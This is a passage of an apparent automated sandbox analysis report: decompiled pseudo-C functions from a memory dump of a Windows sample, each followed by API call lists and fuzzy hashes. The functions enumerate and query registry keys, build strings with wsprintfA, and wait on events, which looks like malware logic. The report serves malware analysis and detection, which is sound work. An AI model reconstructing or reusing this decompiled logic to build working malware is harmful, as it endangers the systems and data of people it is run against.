                                						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                					}
                                					if(_t27 != 0 && _t31 != 0) {
                                						 *_t27 =  *_t27 & 0xfffffffe;
                                					}
                                					L19:
                                					if(_t25 != 0) {
                                						CloseHandle(_t25);
                                					}
                                					L21:
                                					return _t31;
                                				}
                                			}

                                APIs
                                  • Part of subcall function 04612DEA: lstrlen.KERNEL32(E8FA7DD7,00000000,63699BC3,00000027,00000000,053C9C98,74ECC740,046155DE,?,63699BC3,E8FA7DD7,00000000,?,?,?,046155DE), ref: 04612E20
                                  • Part of subcall function 04612DEA: lstrcpy.KERNEL32(00000000,00000000), ref: 04612E44
                                  • Part of subcall function 04612DEA: lstrcat.KERNEL32(00000000,00000000), ref: 04612E4C
                                • CreateEventA.KERNEL32(0461A2F8,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,046130E1,?,?,?), ref: 04617402
                                  • Part of subcall function 046150CA: RtlFreeHeap.NTDLL(00000000,00000000,04614239,00000000,00000001,?,00000000,?,?,?,04616B8D,00000000,?,00000001), ref: 046150D6
                                • StrChrW.SHLWAPI(046130E1,00000020,61636F4C,00000001,00000000,?,?,00000000,?,046130E1,?,?,?), ref: 04617432
                                • WaitForSingleObject.KERNEL32(00000000,00004E20,046130E1,00000000,?,00000000,?,046130E1,?,?,?,?,?,?,?,0461211B), ref: 04617460
                                • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,046130E1,?,?,?), ref: 0461748E
                                • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,046130E1,?,?,?), ref: 046174A6
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                • String ID:
                                • API String ID: 73268831-0
                                • Opcode ID: 739d1ada9cbbc817a50ba50b329db6375b172ecb3d9041d7e19972a2eefcc772
                                • Instruction ID: 5bce21483f8a4c275b1ff09c401f41b6286d23521d0ac26243f64f95cb25751a
                                • Opcode Fuzzy Hash: 739d1ada9cbbc817a50ba50b329db6375b172ecb3d9041d7e19972a2eefcc772
                                • Instruction Fuzzy Hash: E621F632A013126BD7215FA88C44B577AE8EF58B66F0D4229FD029B371F774FC048644
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • SysAllocString.OLEAUT32(80000002), ref: 04615C8C
                                • SysAllocString.OLEAUT32(04611E05), ref: 04615CCF
                                • SysFreeString.OLEAUT32(00000000), ref: 04615CE3
                                • SysFreeString.OLEAUT32(00000000), ref: 04615CF1
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: String$AllocFree
                                • String ID:
                                • API String ID: 344208780-0
                                • Opcode ID: c74bb2cff5a6bfd50a673646d6635b0f783a51b503dd3809dec676254c8b8eb5
                                • Instruction ID: da8165eb4bb18ccd0908f5e651e5c34fd975aa15f478f2c045506da9d9eebce7
                                • Opcode Fuzzy Hash: c74bb2cff5a6bfd50a673646d6635b0f783a51b503dd3809dec676254c8b8eb5
                                • Instruction Fuzzy Hash: 49310AB1900149FFCB05DF98D4848EEBBF5FF98340B18842EE50697221E735A945CFA5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E04614039(void* __ecx, intOrPtr _a4) {
                                				int* _v8;
                                				int _v12;
                                				int* _v16;
                                				int _v20;
                                				int* _v24;
                                				char* _v28;
                                				void* _v32;
                                				long _t33;
                                				char* _t35;
                                				long _t39;
                                				long _t42;
                                				intOrPtr _t47;
                                				void* _t51;
                                				long _t53;
                                
                                				_t51 = __ecx;
                                				_v8 = 0;
                                				_v16 = 0;
                                				_v12 = 0;
                                				_v24 = 0;
                                				_t33 = RegOpenKeyExA(0x80000003, 0, 0, 0x20019,  &_v32); // executed
                                				_t53 = _t33;
                                				if(_t53 != 0) {
                                					L18:
                                					return _t53;
                                				}
                                				_t53 = 8;
                                				_t35 = E04616837(0x104);
                                				_v28 = _t35;
                                				if(_t35 == 0) {
                                					L17:
                                					RegCloseKey(_v32); // executed
                                					goto L18;
                                				}
                                				_v20 = 0x104;
                                				do {
                                					_v16 = _v20;
                                					_v12 = 0x104;
                                					_t39 = RegEnumKeyExA(_v32, _v8, _v28,  &_v12, 0, 0, 0, 0); // executed
                                					_t53 = _t39;
                                					if(_t53 != 0xea) {
                                						if(_t53 != 0) {
                                							L14:
                                							if(_t53 == 0x103) {
                                								_t53 = 0;
                                							}
                                							L16:
                                							E046150CA(_v28);
                                							goto L17;
                                						}
                                						_t42 = E04611D57(_t51, _v32, _v28, _v24, _v12,  &_v8, _a4); // executed
                                						_t53 = _t42;
                                						if(_t53 != 0) {
                                							goto L14;
                                						}
                                						goto L12;
                                					}
                                					if(_v12 <= 0x104) {
                                						if(_v16 <= _v20) {
                                							goto L16;
                                						}
                                						E046150CA(_v24);
                                						_v20 = _v16;
                                						_t47 = E04616837(_v16);
                                						_v24 = _t47;
                                						if(_t47 != 0) {
                                							L6:
                                							_t53 = 0;
                                							goto L12;
                                						}
                                						_t53 = 8;
                                						goto L16;
                                					}
                                					_v8 = _v8 + 1;
                                					goto L6;
                                					L12:
                                				} while (WaitForSingleObject( *0x461a2c4, 0) == 0x102);
                                				goto L16;
                                			}

                                APIs
                                • RegOpenKeyExA.KERNELBASE(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,046130C2,?), ref: 0461405F
                                  • Part of subcall function 04616837: RtlAllocateHeap.NTDLL(00000000,00000000,04614197), ref: 04616843
                                • RegEnumKeyExA.KERNELBASE(?,?,?,046130C2,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,046130C2), ref: 046140A6
                                • WaitForSingleObject.KERNEL32(00000000,?,?,?,046130C2,?,046130C2,?,?,?,?,?,046130C2,?), ref: 04614113
                                • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,046130C2,?,?,?,?,?,0461211B,?), ref: 0461413B
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: AllocateCloseEnumHeapObjectOpenSingleWait
                                • String ID:
                                • API String ID: 3664505660-0
                                • Opcode ID: dfc0adea2da2660be1425a849a4e7035e9c5825f7b97191d7c9685d95cddd7c3
                                • Instruction ID: 62a36709955338e5a37628b76b0e96d4d572fb03c8c691a47fb3654462ded02a
                                • Opcode Fuzzy Hash: dfc0adea2da2660be1425a849a4e7035e9c5825f7b97191d7c9685d95cddd7c3
                                • Instruction Fuzzy Hash: 4E319A71D00129EBCF21AFE5CC459FEFFB9EBA5311F18406AE510B3260E6745A80DBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 41%
                                			E04613032(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                                				intOrPtr _v12;
                                				void* _v16;
                                				void* _v28;
                                				char _v32;
                                				void* __esi;
                                				void* _t20;
                                				void* _t26;
                                				void* _t29;
                                				void* _t38;
                                				signed int* _t39;
                                				void* _t40;
                                
                                				_t36 = __ecx;
                                				_v32 = 0;
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				_v12 = _a4;
                                				_t20 = E04616710(__ecx,  &_v32); // executed
                                				_t38 = _t20;
                                				if(_t38 != 0) {
                                					L12:
                                					_t39 = _a8;
                                					L13:
                                					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
                                						_t23 =  &(_t39[1]);
                                						if(_t39[1] != 0) {
                                							E046115B9(_t23);
                                						}
                                					}
                                					return _t38;
                                				}
                                				_t26 = E04614C8C(0x40,  &_v16); // executed
                                				if(_t26 != 0) {
                                					_v16 = 0;
                                				}
                                				_t40 = CreateEventA(0x461a2f8, 1, 0,  *0x461a394);
                                				if(_t40 != 0) {
                                					SetEvent(_t40);
                                					Sleep(0xbb8); // executed
                                					FindCloseChangeNotification(_t40); // executed
                                				}
                                				_push( &_v32);
                                				if(_a12 == 0) {
                                					_t29 = E04614039(_t36); // executed
                                				} else {
                                					_push(0);
                                					_push(0);
                                					_push(0);
                                					_push(0);
                                					_push(0);
                                					_t29 = E04611D57(_t36);
                                				}
                                				_t41 = _v16;
                                				_t38 = _t29;
                                				if(_v16 != 0) {
                                					E04613C84(_t41);
                                				}
                                				if(_t38 != 0) {
                                					goto L12;
                                				} else {
                                					_t39 = _a8;
                                					_t38 = E046173C3( &_v32, _t39);
                                					goto L13;
                                				}
                                			}

                                APIs
                                • CreateEventA.KERNEL32(0461A2F8,00000001,00000000,00000040,?,?,7519F710,00000000,7519F730,?,?,?,?,0461211B,?,00000001), ref: 04613083
                                • SetEvent.KERNEL32(00000000,?,?,?,?,0461211B,?,00000001,0461560C,00000002,?,?,0461560C), ref: 04613090
                                • Sleep.KERNELBASE(00000BB8,?,?,?,?,0461211B,?,00000001,0461560C,00000002,?,?,0461560C), ref: 0461309B
                                • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,0461211B,?,00000001,0461560C,00000002,?,?,0461560C), ref: 046130A2
                                  • Part of subcall function 04614039: RegOpenKeyExA.KERNELBASE(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,046130C2,?), ref: 0461405F
                                  • Part of subcall function 04614039: RegEnumKeyExA.KERNELBASE(?,?,?,046130C2,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,046130C2), ref: 046140A6
                                  • Part of subcall function 04614039: WaitForSingleObject.KERNEL32(00000000,?,?,?,046130C2,?,046130C2,?,?,?,?,?,046130C2,?), ref: 04614113
                                  • Part of subcall function 04614039: RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,046130C2,?,?,?,?,?,0461211B,?), ref: 0461413B
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: CloseEvent$ChangeCreateEnumFindNotificationObjectOpenSingleSleepWait
                                • String ID:
                                • API String ID: 780868161-0
                                • Opcode ID: e6f8a228859852db00157472b2d62fb14996ceab41074707cc95d8f983d73bd9
                                • Instruction ID: 3dc8181faaf1690d1d7042a055aca8159a3d19f0d2b2b31d9dc49094725398ac
                                • Opcode Fuzzy Hash: e6f8a228859852db00157472b2d62fb14996ceab41074707cc95d8f983d73bd9
                                • Instruction Fuzzy Hash: B9218872900214ABEB10AFE584849DE77BDAB04351B0D442AED12E7320FB35F985C761
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E04616A36(int _a4, int _a8, void* _a12, short* _a16, char** _a20, intOrPtr* _a24) {
                                				long _t26;
                                				intOrPtr* _t38;
                                				char* _t42;
                                				long _t43;
                                
                                				if(_a4 == 0) {
                                					L2:
                                					_t26 = RegOpenKeyW(_a8, _a12,  &_a12); // executed
                                					_t43 = _t26;
                                					if(_t43 == 0) {
                                						RegQueryValueExW(_a12, _a16, 0,  &_a8, 0,  &_a4); // executed
                                						if(_a4 == 0) {
                                							_t43 = 0xe8;
                                						} else {
                                							_t42 = E04616837(_a4);
                                							if(_t42 == 0) {
                                								_t43 = 8;
                                							} else {
                                								_t43 = RegQueryValueExW(_a12, _a16, 0,  &_a8, _t42,  &_a4);
                                								if(_t43 != 0) {
                                									E046150CA(_t42);
                                								} else {
                                									 *_a20 = _t42;
                                									_t38 = _a24;
                                									if(_t38 != 0) {
                                										 *_t38 = _a4;
                                									}
                                								}
                                							}
                                						}
                                						RegCloseKey(_a12); // executed
                                					}
                                					L12:
                                					return _t43;
                                				}
                                				_t43 = E04614323(_a4, _a8, _a12, _a16, _a20, _a24);
                                				if(_t43 == 0) {
                                					goto L12;
                                				}
                                				goto L2;
                                			}

                                APIs
                                • RegOpenKeyW.ADVAPI32(80000002,053C9D8C,053C9D8C), ref: 04616A6F
                                • RegQueryValueExW.KERNELBASE(053C9D8C,?,00000000,80000002,00000000,00000000,?,04611E36,3D046190,80000002,046130C2,00000000,046130C2,?,053C9D8C,80000002), ref: 04616A91
                                • RegQueryValueExW.ADVAPI32(053C9D8C,?,00000000,80000002,00000000,00000000,00000000,?,04611E36,3D046190,80000002,046130C2,00000000,046130C2,?,053C9D8C), ref: 04616AB6
                                • RegCloseKey.KERNELBASE(053C9D8C,?,04611E36,3D046190,80000002,046130C2,00000000,046130C2,?,053C9D8C,80000002,00000000,?), ref: 04616AE6
                                  • Part of subcall function 04614323: SafeArrayDestroy.OLEAUT32(00000000), ref: 046143A8
                                  • Part of subcall function 046150CA: RtlFreeHeap.NTDLL(00000000,00000000,04614239,00000000,00000001,?,00000000,?,?,?,04616B8D,00000000,?,00000001), ref: 046150D6
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: QueryValue$ArrayCloseDestroyFreeHeapOpenSafe
                                • String ID:
                                • API String ID: 486277218-0
                                • Opcode ID: af8fd032159088eb2993557bad76c8fbd94ec68e78001c02d544a7f0acb59e1e
                                • Instruction ID: 3e051c132e5378b6f80aa7009b42deb08920caf5ce2c244fbb3cc5afce1265ee
                                • Opcode Fuzzy Hash: af8fd032159088eb2993557bad76c8fbd94ec68e78001c02d544a7f0acb59e1e
                                • Instruction Fuzzy Hash: 0421097650015DBFDF11AE94DC80CEE7B69EB08355B08802AFE1597230E672ED65DBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 78%
                                			E04614D09(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
                                				intOrPtr _v8;
                                				void* _v12;
                                				void* _v16;
                                				intOrPtr _t26;
                                				intOrPtr* _t28;
                                				intOrPtr _t31;
                                				intOrPtr* _t32;
                                				void* _t39;
                                				int _t46;
                                				intOrPtr* _t47;
                                				int _t48;
                                
                                				_t47 = __eax;
                                				_push( &_v12);
                                				_push(__eax);
                                				_t39 = 0;
                                				_t46 = 0; // executed
                                				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
                                				_v8 = _t26;
                                				if(_t26 < 0) {
                                					L13:
                                					return _v8;
                                				}
                                				if(_v12 == 0) {
                                					Sleep(0xc8);
                                					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
                                				}
                                				if(_v8 >= _t39) {
                                					_t28 = _v12;
                                					if(_t28 != 0) {
                                						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
                                						_v8 = _t31;
                                						if(_t31 >= 0) {
                                							_t46 = lstrlenW(_v16);
                                							if(_t46 != 0) {
                                								_t46 = _t46 + 1;
                                								_t48 = _t46 + _t46;
                                								_t39 = E04616837(_t48);
                                								if(_t39 == 0) {
                                									_v8 = 0x8007000e;
                                								} else {
                                									memcpy(_t39, _v16, _t48);
                                								}
                                								__imp__#6(_v16); // executed
                                							}
                                						}
                                						_t32 = _v12;
                                						 *((intOrPtr*)( *_t32 + 8))(_t32);
                                					}
                                					 *_a4 = _t39;
                                					 *_a8 = _t46 + _t46;
                                				}
                                				goto L13;
                                			}

                                APIs
                                • Sleep.KERNEL32(000000C8), ref: 04614D37
                                • lstrlenW.KERNEL32(?), ref: 04614D6D
                                • memcpy.NTDLL(00000000,?,00000000,00000000), ref: 04614D8E
                                • SysFreeString.OLEAUT32(?), ref: 04614DA2
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: FreeSleepStringlstrlenmemcpy
                                • String ID:
                                • API String ID: 1198164300-0
                                • Opcode ID: 5b4a9f612258eba2e62c13a50008e4b2327029019263293b9fcbb4eb4cfa833e
                                • Instruction ID: ee388d0d3fe272a6e7a7928862fd801a5dd3f71e5703b32e20e4fec581406bec
                                • Opcode Fuzzy Hash: 5b4a9f612258eba2e62c13a50008e4b2327029019263293b9fcbb4eb4cfa833e
                                • Instruction Fuzzy Hash: 83211B75E00219FFCB10DFA4C88499EBBB8EF49355B18816AE905D7220EB31AA45CB50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E04611AB8(void* __edx) {
                                				void* _v8;
                                				int _v12;
                                				WCHAR* _v16;
                                				void* __edi;
                                				void* __esi;
                                				void* _t23;
                                				intOrPtr _t24;
                                				void* _t26;
                                				intOrPtr _t32;
                                				intOrPtr _t35;
                                				void* _t37;
                                				intOrPtr _t38;
                                				intOrPtr _t42;
                                				void* _t45;
                                				void* _t50;
                                				void* _t52;
                                
                                				_t50 = __edx;
                                				_v12 = 0;
                                				_t23 = E04614C8C(0,  &_v8); // executed
                                				if(_t23 != 0) {
                                					_v8 = 0;
                                				}
                                				_t24 =  *0x461a2d4; // 0xdad5a8
                                				_t4 = _t24 + 0x461bd60; // 0x53c9308
                                				_t5 = _t24 + 0x461bd08; // 0x4f0053
                                				_t26 = E04615384( &_v16, _v8, _t5, _t4); // executed
                                				_t45 = _t26;
                                				if(_t45 == 0) {
                                					StrToIntExW(_v16, 0,  &_v12);
                                					_t45 = 8;
                                					if(_v12 < _t45) {
                                						_t45 = 1;
                                						__eflags = 1;
                                					} else {
                                						_t32 =  *0x461a2d4; // 0xdad5a8
                                						_t11 = _t32 + 0x461bd54; // 0x53c92fc
                                						_t48 = _t11;
                                						_t12 = _t32 + 0x461bd08; // 0x4f0053
                                						_t52 = E04615D37(_t11, _t12, _t11);
                                						_t59 = _t52;
                                						if(_t52 != 0) {
                                							_t35 =  *0x461a2d4; // 0xdad5a8
                                							_t13 = _t35 + 0x461bd9e; // 0x30314549
                                							_t37 = E046174B6(_t48, _t50, _t59, _v8, _t52, _t13, 0x14); // executed
                                							if(_t37 == 0) {
                                								_t61 =  *0x461a2b4 - 6;
                                								if( *0x461a2b4 <= 6) {
                                									_t42 =  *0x461a2d4; // 0xdad5a8
                                									_t15 = _t42 + 0x461bbaa; // 0x52384549
                                									E046174B6(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
                                								}
                                							}
                                							_t38 =  *0x461a2d4; // 0xdad5a8
                                							_t17 = _t38 + 0x461bd98; // 0x53c9340
                                							_t18 = _t38 + 0x461bd70; // 0x680043
                                							_t45 = E04611F7A(_v8, 0x80000001, _t52, _t18, _t17);
                                							HeapFree( *0x461a290, 0, _t52);
                                						}
                                					}
                                					HeapFree( *0x461a290, 0, _v16);
                                				}
                                				_t54 = _v8;
                                				if(_v8 != 0) {
                                					E04613C84(_t54);
                                				}
                                				return _t45;
                                			}

                                APIs
                                • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,053C9308,00000000,?,7519F710,00000000,7519F730), ref: 04611B07
                                • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,053C9340,?,00000000,30314549,00000014,004F0053,053C92FC), ref: 04611BA4
                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,046120B0), ref: 04611BB6
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: FreeHeap
                                • String ID:
                                • API String ID: 3298025750-0
                                • Opcode ID: bce8a1a2dba279180818a02a47d1ccd7af8f395e7aea631b695dc36784fb3258
                                • Instruction ID: a3df593ae81b93899fcce98ab634cb40732dbf8814af406bc3986e353dd01a1f
                                • Opcode Fuzzy Hash: bce8a1a2dba279180818a02a47d1ccd7af8f395e7aea631b695dc36784fb3258
                                • Instruction Fuzzy Hash: D2317C71A10109BFDB11DBE0DD84EDA7BB8EB49B04F1C016BA604A7271F675BE08DB50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 91%
                                			E04615F9A(intOrPtr* __eax, void* __ecx, void* __edx, long _a4, void** _a8, intOrPtr* _a12, char _a16) {
                                				void* _v8;
                                				char _v48;
                                				void* __edi;
                                				intOrPtr _t22;
                                				long _t29;
                                				intOrPtr _t33;
                                				intOrPtr* _t41;
                                				void* _t42;
                                				void* _t46;
                                				intOrPtr* _t47;
                                				void* _t48;
                                				intOrPtr _t50;
                                
                                				_t46 = __edx;
                                				_t42 = __ecx;
                                				_t41 = _a16;
                                				_t47 = __eax;
                                				_t22 =  *0x461a2d4; // 0xdad5a8
                                				_t2 = _t22 + 0x461b662; // 0x657a6973
                                				wsprintfA( &_v48, _t2,  *__eax,  *_t41);
                                				if( *0x461a2a4 >= 5) {
                                					_push( &_a16);
                                					_push( &_v8);
                                					_push( &_v48);
                                					_t29 = _a4;
                                					"QQSUVWh"();
                                					L5:
                                					_a4 = _t29;
                                					L6:
                                					if(_a4 != 0) {
                                						L9:
                                						 *0x461a2a4 =  *0x461a2a4 + 1;
                                						L10:
                                						return _a4;
                                					}
                                					_t49 = _a16;
                                					 *_t47 = _a16;
                                					_t48 = _v8;
                                					 *_t41 = E0461283A(_t49, _t48); // executed
                                					_t33 = E0461738C(_t48, _t49); // executed
                                					if(_t33 != 0) {
                                						 *_a8 = _t48;
                                						 *_a12 = _t33;
                                						if( *0x461a2a4 < 5) {
                                							 *0x461a2a4 =  *0x461a2a4 & 0x00000000;
                                						}
                                						goto L10;
                                					}
                                					_a4 = 0xbf;
                                					E04611492();
                                					HeapFree( *0x461a290, 0, _t48);
                                					goto L9;
                                				}
                                				_t50 =  *0x461a390; // 0x53c8d5d
                                				if(RtlAllocateHeap( *0x461a290, 0, 0x800) == 0) {
                                					_a4 = 8;
                                					goto L6;
                                				}
                                				_t29 = E046146D1(_a4, _t42, _t46, _t50,  &_v48,  &_v8,  &_a16, _t36); // executed
                                				goto L5;
                                			}

                                APIs
                                • wsprintfA.USER32 ref: 04615FBC
                                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04615FE1
                                  • Part of subcall function 046146D1: GetTickCount.KERNEL32 ref: 046146E8
                                  • Part of subcall function 046146D1: wsprintfA.USER32 ref: 04614735
                                  • Part of subcall function 046146D1: wsprintfA.USER32 ref: 04614752
                                  • Part of subcall function 046146D1: wsprintfA.USER32 ref: 04614772
                                  • Part of subcall function 046146D1: wsprintfA.USER32 ref: 04614790
                                  • Part of subcall function 046146D1: wsprintfA.USER32 ref: 046147B3
                                  • Part of subcall function 046146D1: wsprintfA.USER32 ref: 046147D4
                                • HeapFree.KERNEL32(00000000,046120FA,?,?,046120FA,?), ref: 0461605B
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: wsprintf$Heap$AllocateCountFreeTick
                                • String ID:
                                • API String ID: 2794511967-0
                                • Opcode ID: 0f9f8682f0ccb1b32ba72e26bbe867fe3343fc3deb8f9c4091dfd595a687675b
                                • Instruction ID: 267c92a02a23d4bb633d2969e8673253dea14624c9d95c652715075d9019913f
                                • Opcode Fuzzy Hash: 0f9f8682f0ccb1b32ba72e26bbe867fe3343fc3deb8f9c4091dfd595a687675b
                                • Instruction Fuzzy Hash: E6314C75601209EFCB01DFA4DA44ADA3BB9FF08355F184026F905D7261FB39E954CBA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 79%
                                			E04612F68(void* __eax, char* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16, void** _a20, intOrPtr* _a24) {
                                				char _v5;
                                				signed int _v12;
                                				intOrPtr _v16;
                                				char _t28;
                                				void* _t33;
                                				void* _t38;
                                				void* _t45;
                                				char* _t46;
                                				void* _t48;
                                				char* _t56;
                                				char* _t57;
                                				intOrPtr _t59;
                                				void* _t60;
                                
                                				_t56 = _a4;
                                				_t60 = __eax;
                                				_v12 = 0xb;
                                				if(_t56 != 0 && __eax != 0) {
                                					_t5 = _t60 - 1; // -1
                                					_t46 =  &(_t56[_t5]);
                                					_t28 =  *_t46;
                                					_v5 = _t28;
                                					 *_t46 = 0;
                                					__imp__(_a8, _t45);
                                					_v16 = _t28;
                                					_t57 = StrStrA(_t56, _a8);
                                					if(_t57 != 0) {
                                						 *_t46 = _v5;
                                						_t33 = RtlAllocateHeap( *0x461a290, 0, _a16 + _t60); // executed
                                						_t48 = _t33;
                                						if(_t48 == 0) {
                                							_v12 = 8;
                                						} else {
                                							_t58 = _t57 - _a4;
                                							E046177A4(_t57 - _a4, _a4, _t48);
                                							_t38 = E046177A4(_a16, _a12, _t58 + _t48);
                                							_t53 = _v16;
                                							_t59 = _a16;
                                							E046177A4(_t60 - _t58 - _v16, _t53 + _t58 + _a4, _t38 + _t59);
                                							 *_a20 = _t48;
                                							_v12 = _v12 & 0x00000000;
                                							 *_a24 = _t60 - _v16 + _t59;
                                						}
                                					}
                                				}
                                				return _v12;
                                			}

                                APIs
                                • lstrlen.KERNEL32(7519F710,?,00000000,?,7519F710), ref: 04612F9C
                                • StrStrA.SHLWAPI(00000000,?), ref: 04612FA9
                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 04612FC8
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: AllocateHeaplstrlen
                                • String ID:
                                • API String ID: 556738718-0
                                • Opcode ID: 01d3fa1c8940302183aa39b409018e08cf3ce30af98bbda06d3a5c59209fa7c9
                                • Instruction ID: 0f691f7d6eb02ff2263ffbea0b4b5e6684a83d12c14239fbe623d97f3639d7e9
                                • Opcode Fuzzy Hash: 01d3fa1c8940302183aa39b409018e08cf3ce30af98bbda06d3a5c59209fa7c9
                                • Instruction Fuzzy Hash: A8217C39600149AFDF01CF68C984B9EBFB5EF85315F088155EC04AB324D735E955CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E046171A5(void* __ecx, void* __eflags) {
                                				char _v8;
                                				void* _v12;
                                				int _v16;
                                				int _v20;
                                				intOrPtr _t15;
                                				intOrPtr _t19;
                                				long _t24;
                                				long _t29;
                                				short* _t31;
                                				short* _t34;
                                
                                				_t15 =  *0x461a2d4; // 0xdad5a8
                                				_v8 = _v8 & 0x00000000;
                                				_t3 = _t15 + 0x461ba30; // 0x4f0053
                                				_v16 = 4;
                                				_t31 = E04613875(__ecx, _t3);
                                				if(_t31 != 0) {
                                					_t19 =  *0x461a2d4; // 0xdad5a8
                                					_t5 = _t19 + 0x461ba8c; // 0x6e0049
                                					_t34 = E04613875(__ecx, _t5);
                                					if(_t34 != 0) {
                                						_t24 = RegOpenKeyExW(0x80000002, _t31, 0, 0x20119,  &_v12); // executed
                                						if(_t24 == 0) {
                                							_t29 = RegQueryValueExW(_v12, _t34, 0,  &_v20,  &_v8,  &_v16); // executed
                                							if(_t29 != 0) {
